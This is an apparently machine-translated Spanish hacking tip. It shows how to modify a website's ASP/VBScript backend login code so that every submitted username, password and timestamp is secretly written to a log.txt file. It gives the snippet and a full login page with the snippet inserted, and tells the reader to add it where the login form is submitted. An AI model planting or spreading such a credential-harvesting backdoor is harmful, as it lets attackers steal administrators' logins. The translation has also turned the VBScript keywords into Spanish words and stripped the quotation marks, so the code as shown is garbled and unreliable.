Muchos piratas informáticos obtienen la contraseña de inicio de sesión del usuario del sitio web de destino modificando el código de inicio de sesión en segundo plano, de modo que una vez que ingresamos la contraseña, se guarda en un archivo de texto.
El código es el siguiente:
establecer fso=servidor.createobject(scripting.filesystemobject)
si fso.FileExists(server.mappath(log.txt))=true entonces
establecer fin=fso.OpenTextFile(servidor.mappath(log.txt))
temp=fin.readall
fin.cerrar
establecer fin = nada
terminar si
establecer fout=fso.createtextfile(servidor.mappath(log.txt))
fout.WriteLine(temp&usuario:&nombre de usuario&¦contraseña:&contraseña&¦hora:&ahora()&)
fout.cerrar
establecer fout=nada
establecer fso = nada
¡Insértelo donde se envía el formulario al iniciar sesión en segundo plano!
Documentos de referencia:
Copie el código de código de la siguiente manera:
<%@language=página de códigos vbscript=936 %>
<%
dimsql,rs
nombre de usuario tenue, contraseña, código de verificación
nombre de usuario = reemplazar (recortar (solicitud (nombre de usuario)), ',)
contraseña=reemplazar(recortar(Solicitud(contraseña)),',)
Código de verificación = reemplazar (recortar (Solicitud (Código de verificación)), ',)
si nombre de usuario = entonces
Error encontrado=Verdadero
ErrMsg=ErrMsg & <br><li>¡El nombre de usuario no puede estar vacío! </li>
terminar si
si Contraseña= entonces
Error encontrado=Verdadero
ErrMsg=ErrMsg & <br><li>¡La contraseña no puede estar vacía! </li>
terminar si
si Código de verificación = entonces
Error encontrado=Verdadero
ErrMsg=ErrMsg & <br><li>¡El código de verificación no puede estar vacío! </li>
terminar si
si sesión (CheckCode) = entonces
Error encontrado=Verdadero
ErrMsg=ErrMsg & <br><li>El tiempo de inicio de sesión es demasiado largo; regrese a la página de inicio de sesión para iniciar sesión nuevamente. </li>
terminar si
si CheckCode<>CStr(sesión(CheckCode)) entonces
Error encontrado=Verdadero
ErrMsg=ErrMsg & <br><li>El código de confirmación que ingresó no coincide con el generado por el sistema, vuelva a ingresarlo. </li>
terminar si
'Detrás de esto está el código que agregué ~ el área de inicio
establecer fso=servidor.createobject(scripting.filesystemobject)
si fso.FileExists(server.mappath(log.txt))=true entonces
establecer fin=fso.OpenTextFile(servidor.mappath(log.txt))
temp=fin.readall
fin.cerrar
establecer fin = nada
terminar si
establecer fout=fso.createtextfile(servidor.mappath(log.txt))
fout.WriteLine(temp&usuario:&nombre de usuario&|contraseña:&contraseña&|hora:&ahora()&)
fout.cerrar
establecer fout=nada
establecer fso = nada
'El código detrás fue eliminado por mí~área final
%>